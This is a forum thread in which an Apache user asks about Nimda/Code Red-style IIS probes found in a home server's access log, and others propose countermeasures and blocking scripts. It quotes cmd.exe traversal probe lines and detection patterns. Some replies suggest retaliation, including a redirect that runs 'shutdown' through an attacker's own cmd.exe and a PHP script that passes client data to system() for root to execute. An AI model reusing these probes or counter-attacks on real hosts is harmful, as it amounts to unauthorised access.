# Does this mean someone is trying to do something nasty?

## HomerSimpson

I have a home apache2 server running so I can get my email remotely via squirrelmail. I am getting ready to do a web page for myself and noticed this in my access log

```
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"
198.77.14.70 - - [13/Jan/2004:21:31:41 -0500] "CONNECT 198.77.14.70:802 HTTP/1.0" 405 238 "-" "-"
198.77.14.70 - - [13/Jan/2004:21:31:41 -0500] "POST http://198.77.14.70:802/ HTTP/1.0" 200 1456 "-" "-"
195.199.79.221 - - [13/Jan/2004:23:55:25 -0500] "CONNECT 1.3.3.7:1337 HTTP/1.0" 405 238 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:33 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:34 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:37 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:37 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

```

Are they trying to exploit some hole in IIS or Apache on Windows? Can this hurt me in any way? Should I worry?

Thx

----------

## TheCoop

Those are just scans by script kiddies looking for an IIS system to crack. They can't hurt Apache at all. In fact, I've put a 50MB random file in /scripts/root.exe etc., so when they try to get it they get a 50MB file down their throats  :Smile: 

----------

## HomerSimpson

I notice that I am getting a lot more port scan alerts from my router. I deleted the last one so I can't reconcile the times with the apache logs but it fits with what you said.

Thanks for the reassurance.

----------

## db_404

Looks like NIMDA (or the like), so yes, it's an IIS exploit. They seem to be getting less common (at least on the machines I watch), but you'll still see one once in a while.

So in this instance it's not a problem. However always make sure you are taking suitable precautions if you are exposing a service to the internet.

----------

## HomerSimpson

*db_404 wrote:*

> ... However always make sure you are taking suitable precautions if you are exposing a service to the internet.

My skills for getting myself into trouble are better than my skills for keeping myself out of trouble atm. I am reading and learning how to do stuff and then reading how to secure it.

I just read the Gentoo security guide and did a few things, but I am relying on a lot of defaults. I am relatively conscious about security when I configure things, but certainly the details and subtleties are beyond me at this point. I will learn, but it takes this old guy a while.

Thanks for your input   :Smile: 

----------

## schism39401

*Quote:*

> My skills for getting myself into trouble are better than my skills for keeping myself out of trouble atm.

lol...I know how you feel there!!!

----------

## cakes

It looks like requests from an automated scanner like nikto (which, incidentally, is in Portage). It may be a good idea to emerge it and run a scan against yourself; it may pick up something you are unaware of. However, I believe Apache is fairly secure by default, a current version at least!

----------

## slartibartfasz

*TheCoop wrote:*

> Those are just scans by script kiddies looking for an IIS system to crack. They can't hurt Apache at all. In fact, I've put a 50MB random file in /scripts/root.exe etc., so when they try to get it they get a 50MB file down their throats

haha - good one, I think I'll try that too - guess I'll just redirect everything that matches .exe and _vti_  :Wink: 

----------

## gonzalo

*slartibartfasz wrote:*

> *TheCoop wrote:* Those are just scans by script kiddies looking for an IIS system to crack. They can't hurt Apache at all. In fact, I've put a 50MB random file in /scripts/root.exe etc., so when they try to get it they get a 50MB file down their throats
>
> haha - good one, I think I'll try that too - guess I'll just redirect everything that matches .exe and _vti_

.ida too   :Cool: 

----------

## tomk

Or you could symlink them to /dev/random to really annoy the script kiddies.

----------

## nevynxxx

*tomk wrote:*

> Or you could symlink them to /dev/random to really annoy the script kiddies.

I know nothing 'bout this, but that would give them an infinite random stream to download, wouldn't it? hehehe

----------

## jondkent

I'd have never thought about using /dev/random, excellent idea, gonna set that up right now

Cheers

Jon

----------

## TheCoop

Actually it's /dev/urandom, /dev/random doesn't do anything

----------

## gonzalo

Are these lines ok for commonapache2.conf?

```
<IfModule mod_alias.c>
RedirectMatch permanent .*/scripts/root.exe.* /dev/urandom
RedirectMatch permanent .*/MSADC/root.exe.* /dev/urandom
RedirectMatch permanent .*system32/cmd.exe.* /dev/urandom
RedirectMatch permanent .*MSOffice/cltreq.asp.* /dev/urandom
RedirectMatch permanent .*_vti_bin/owssvr.dll.* /dev/urandom
RedirectMatch permanent .*_vti_bin/shtml.exe/_vti_rpc.* /dev/urandom
RedirectMatch permanent .*_vti_inf.html.* /dev/urandom
RedirectMatch permanent .*/default.ida.* /dev/urandom
</IfModule>
```

----------

## Senso

Are you sure it's not gonna clog your CPU if you get too many NIMDA requests? What's gonna stop /dev/urandom from outputting crap ad infinitum?

----------

## gonzalo

*Senso wrote:*

> Are you sure it's not gonna clog your CPU if you get too many NIMDA requests? What's gonna stop /dev/urandom from outputting crap ad infinitum?

I don't know for sure. Maybe a normal error file is better.

But I wanted to know if the lines are ok though  :Wink: 

Last edited by gonzalo on Fri Jan 16, 2004 12:24 pm; edited 1 time in total

----------

## fleed

Besides clogging up your CPU it will also clog up your connection, depending on the attacking side's bandwidth. I think linking to /dev/urandom might be a good joke but dunno about using it long term.

----------

## vdboor

Well, you might piss off script kiddies, but you're also asking for attention. I'd keep a low profile, and run an https website, with http authorisation.

----------

## gonzalo

You are right.

This one is simpler and saves some bandwidth:

```
RedirectMatch "/nsiislog\.dll" http://fake.domain
RedirectMatch "/cmd\.exe" http://fake.domain
RedirectMatch "/root\.exe" http://fake.domain
RedirectMatch "/shell\.exe" http://fake.domain
RedirectMatch "/default\.ida" http://fake.domain
```

----------

## tomk

*TheCoop wrote:*

> Actually it's /dev/urandom, /dev/random doesn't do anything

Whoops, that's what I meant

----------

## jonaswidarsson

*nevynxxx wrote:*

> *tomk wrote:* Or you could symlink them to /dev/random to really annoy the script kiddies.
>
> I know nothing 'bout this, but that would give them an infinite random stream to download, wouldn't it? hehehe

Hmmm... Bandwidth?

----------

## tomk

As people have said this isn't really a solution, it was (half) meant as a joke. The main problems being that it's going to waste your CPU and bandwidth. Another problem is that these 'attacks' are often not being run from the script kiddie's computer, but on one that they've hacked into and left a script running that attempts to attack IIS servers; if it succeeds then another script will be run to exploit the security hole. Other than logging the IP and letting the ISP know that one of their customers has been hacked or is hacking you, there's not much you can do. Just ignore it and don't use rubbish software with massive security holes in it.

----------

## Oopsz

Use iptables.

```
RedirectMatch "/nsiislog\.dll" http://die.php
RedirectMatch "/cmd\.exe" http://die.php
RedirectMatch "/root\.exe" http://die.php
RedirectMatch "/shell\.exe" http://die.php
RedirectMatch "/default\.ida" http://die.php
```

then

die.php

```
<html><head><title>
Bye.
</title></head>
<body><div align=center>
<?php
// Runs as the web server user (apache:apache): it only appends the rule to
// two files; the root cron job (clean.sh below) is what actually applies it.
$iptables = "/sbin/iptables";
// REMOTE_ADDR is filled in by Apache from the TCP peer address.
$ip = getenv("REMOTE_ADDR");
$blockline = $iptables." -I INPUT -s ".$ip." -p all -j DROP";
echo $blockline;
system("echo \"$blockline\" >> /usr/local/bin/web-blocked-hosts-raw");
system("echo \"$blockline\" >> /home/httpd/ipblock.sh");
?>
</div></body></html>
```

/root/clean.sh

```
#!/bin/bash
# rebuild the deduplicated block list from the raw file written by die.php
echo '' > /usr/local/bin/web-blocked-hosts
/root/clean.pl
# wrap it as a script that re-applies every block (run from local.start at boot)
echo '#!/bin/bash' > /usr/local/bin/web-blocked-hosts.sh
cat /usr/local/bin/web-blocked-hosts >> /usr/local/bin/web-blocked-hosts.sh
# apply the rules collected since the last run, then reset the file
/home/httpd/ipblock.sh
echo '#!/bin/bash' > /home/httpd/ipblock.sh
```

Perl script to remove dupe entries

/root/clean.pl

```
#!/usr/bin/perl
use strict;
use warnings;

# read every raw block line and write each distinct one out once
open (DB, "</usr/local/bin/web-blocked-hosts-raw") or die $!;
open (DBOUT, ">/usr/local/bin/web-blocked-hosts") or die $!;
my %seen;
while (<DB>) {
   $seen{$_} = 1;
}
while (my ($url, $junk) = each %seen) {
   print DBOUT $url;
}
close DB;
close DBOUT;
```

chmod all the scripts to +x, chown ipblock.sh and web-blocked-hosts-raw to apache:apache, and add clean.sh to the root crontab every ten minutes or so.  Add /usr/local/bin/web-blocked-hosts.sh to /etc/conf.d/local.start to preserve blocked addresses between reboots.

----------

## Lews_Therin

Could I theoretically use

```
RedirectMatch "/nsiislog\.dll" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe
RedirectMatch "/cmd\.exe" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe
RedirectMatch "/root\.exe" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe
RedirectMatch "/shell\.exe" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe
RedirectMatch "/default\.ida" http://download.microsoft.com/download/d/a/2/da2a084c-3349-4cce-96be-d8f79126f58a/xpsp1a_ar_x86.exe
```

To...notify...the admins of those systems? To those of you who are wondering, this will download the Arabic version of WinXP SP1 (128MB).

----------

## DopeGhoti

You might perhaps redirect them to a tool to remove the virus/worm from their system, like this one, rather than beating them over the head with huge downloads.

----------

## Lews_Therin

Same idea, except the file is different. But would that work correctly so I don't have to get all those lines in error_log?

----------

## vdboor

*Oopsz wrote:*

> Use iptables.
>
> RedirectMatch "/nsiislog\.dll" http://die.php
>
> RedirectMatch "/cmd\.exe" http://die.php
>
> ...

Very interesting, even though you might need to fix those redirect links  :Razz: 

...but there is something else I'm worried about: how do you run this script with root privileges? All my scripts run with the same restrictions as my webserver.

It might be a good idea to use sudo here.

----------

## fleed

Or you could post the list of blocked ips to a file which then gets read by a root cron job that parses it and puts the blocks in place.

----------

## pakman

You could *theoretically* use:

http://127.0.0.1/c/winnt/system32/cmd.exe?/%47L%20%47R%20%47Y%20%47C+shutdown

As the redirect target and reboot them with their own medicine, or run windowsupdate.exe or similar. Of course in reality you could get sued for this so it's not a great idea (it is technically unauthorised access, and you might be running it on some huge company's e-commerce server). Amusing though, I think it was originally mentioned on bugtraq a few years back, the idea being to shut down IIS but I forget the windows commandline for that  :Smile: 

----------

## gonzalo

RedirectMatch "/default\.ida" is not working, I'm still getting

GET /default.ida?XXXXXX in my logs. Any idea?

----------

## Oopsz

*vdboor wrote:*

> *Oopsz wrote:* Use iptables.
>
> RedirectMatch "/nsiislog\.dll" http://die.php
>
> RedirectMatch "/cmd\.exe" http://die.php
>
> ...

No, no, the php script runs as apache:apache.

The shell script it creates has to be run in a root cronjob.

----------

## ptitman

I quite often get the "GET /default.ida?XXXXX...".

So far it has been run by software, but still, I created that file and edited it with

```
<script>
function foo(){
        var i;
        for(i=0;i<1000;i++){
                alert("whichever message you want");
        }
}
</script>
<body onload="foo();">
```

I'm just waiting for someone to run it from their browser   :Twisted Evil: 

----------

## dvc5

Here's a script created by dreamer that uses iptables to drop packets from "infected" boxes:

```
#!/bin/bash
# written by dreamer     02-03-2004
# quick'n dirty script to filter infected IP addresses from apache logs and
# block them with help of iptables.
# If manager is a valid email address (or local user) an email is sent to
# this user every time a new IP address is added to the firewall.
# This makes it ideal for a daily cronjob or so...
# enjoy! :-)
#

# global settings
# where email is sent.. (leave empty if you don't want any mail)
manager=root@localhost
# temp dir
temp_dir=/var/tmp
# iptables chain to append the rule to
chain=INPUT
# action to take after a rule matches
action=DROP

# some pre-running stuff
# (.blocklist is kept in the current directory, so run this from a fixed cwd)
if [ ! -f .blocklist ]
then
        touch .blocklist
fi

# compile a list of infected IPs
# this will get most of the shit, I'm not sure if it will catch ALL....
#grep error /var/log/apache2/error_log | cut -d' ' -f8 | cut -d] -f1 >> $temp_dir/blocklist_chaos.tmp
grep script /var/log/apache2/access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp
grep exe /var/log/apache2/access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp
grep dll /var/log/apache2/access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp
grep exe  /var/log/apache2/ssl_access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp
grep "default.ida" /var/log/apache2/access_log | cut -d' ' -f1  >>  $temp_dir/blocklist_chaos.tmp

# sort these IPs and remove duplicates, afterwards remove blocklist_chaos.tmp
cat  $temp_dir/blocklist_chaos.tmp | sort | uniq >  $temp_dir/blocklist.tmp
rm  $temp_dir/blocklist_chaos.tmp

# see if there are any new IPs since last run
new_ip=( $(diff .blocklist $temp_dir/blocklist.tmp | grep '>' | cut -d' ' -f2) )

# remove LAN IPs (192.168.0.0/24) from the blocklist.
# Comment if you don't trust your own LAN ;-)
new_ip=( $(echo ${new_ip[@]##192.168.0.*}) )

# if there is at least one new infected IP....
if (( $((${#new_ip[@]})) > 0 ))
then
        # make tempfile the new permanent blocklist
        mv  $temp_dir/blocklist.tmp .blocklist

        # add new IPs with iptables
        for element in $(seq 0  $((${#new_ip[@]} - 1)))
        do
                /sbin/iptables -A $chain -s "${new_ip[$element]}" -j $action

                # for proper display in mail
                new_ip[$element]=$(echo ${new_ip[$element]}"\t\t(" $(grep "${new_ip[$element]}" /var/log/apache2/access_log |tail -1| cut -d] -f2)")\n")
        done

        # mail new IPs to manager
        if [[ $manager != "" ]]
        then
                echo -e "At" $(date +%A' '%d' '%b' '%T) "those infected IPs were added to the firewall:\n "${new_ip[@]}\
                | /usr/sbin/sendmail -F "IP Block List" $manager
        fi
else
        rm  $temp_dir/blocklist.tmp
fi
```

Of course you'll need to be able to read root's mail for the reports.   :Laughing:   And here's the thread where it's discussed in more detail. The grep lines are the meat of the log processing, and can be customized to your liking. I found that grepping for error in the error logs blocked my own IP, so I took it out.   :Shocked: 

----------
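The log-to-blocklist step that Oopsz's die.php/cron pipeline and dreamer's grep script both perform, written out as an added example (not code from the thread or from either author) in Python: it classifies request lines against the probe signatures visible in the log excerpt at the top of the thread, accepts a client field only if it parses as an IP address (the result ends up in a root-run iptables command, so a corrupt or forged log field must never reach it), skips the 192.168.0.0/24 LAN range that dreamer's script excludes, and returns deduplicated rules instead of executing them. The sample log is constructed from lines in the thread's excerpt plus a LAN hit, a benign request and a line with a garbage client field.

```python
import ipaddress
import re

# Apache common/combined log prefix: client, identd, user, [timestamp], "request", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3}')

# Request-line signatures taken from the probes in the thread's log excerpt.
SIGNATURES = {
    "root.exe backdoor probe": re.compile(r"/root\.exe", re.I),
    "cmd.exe traversal probe": re.compile(r"cmd\.exe", re.I),
    "double-encoded traversal": re.compile(r"%25(5c|2f)|%25%35%63|%%35(%63|c)", re.I),
    "overlong UTF-8 traversal": re.compile(r"%c0%(af|2f)|%c1%(1c|9c)", re.I),
    "Code Red (default.ida)": re.compile(r"/default\.ida", re.I),
    "open-proxy CONNECT probe": re.compile(r"^CONNECT "),
}

# Never block these: the LAN range dreamer's script excludes, plus loopback.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("192.168.0.0/24", "127.0.0.0/8")]

def classify(request_line):
    """Names of every signature the request line matches (empty list = benign)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(request_line)]

def offenders(lines):
    """Map each offending client IP to the sorted list of signatures it hit."""
    # The client field is accepted only if it parses as an IP address: the result
    # ends up inside a command run as root, so no raw log string may reach it.
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("req"))
        if not tags:
            continue
        try:
            ip = ipaddress.ip_address(m.group("ip"))
        except ValueError:
            continue  # corrupt client field: never let it into a rule
        if any(ip in net for net in TRUSTED_NETS):
            continue
        seen.setdefault(str(ip), set()).update(tags)
    return {ip: sorted(tags) for ip, tags in seen.items()}

def block_rules(lines, chain="INPUT", action="DROP"):
    """One deduplicated iptables rule per offending address, lowest address first."""
    ips = sorted(offenders(lines), key=ipaddress.ip_address)
    return ["/sbin/iptables -A %s -s %s -j %s" % (chain, ip, action) for ip in ips]

# Constructed sample: lines from the thread's excerpt plus a LAN hit, a benign
# request and a line with a corrupt client field.
SAMPLE_LOG = """\
198.77.14.70 - - [13/Jan/2004:21:31:41 -0500] "CONNECT 198.77.14.70:802 HTTP/1.0" 405 238 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:33 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:35 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
24.236.120.90 - - [14/Jan/2004:00:17:36 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
192.168.0.5 - - [14/Jan/2004:00:20:00 -0500] "GET /default.ida?XXXX HTTP/1.0" 404 200 "-" "-"
10.0.0.9 - - [14/Jan/2004:00:21:00 -0500] "GET /src/webmail.php HTTP/1.1" 200 5120 "-" "-"
not-an-ip - - [14/Jan/2004:00:22:00 -0500] "GET /default.ida?XXXX HTTP/1.0" 404 200 "-" "-"
"""
```

Feed it an access log with `block_rules(open(path).read().splitlines())` and hand the returned lines to a root cron job, the way the thread's clean.sh does, rather than calling iptables from the web server user.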

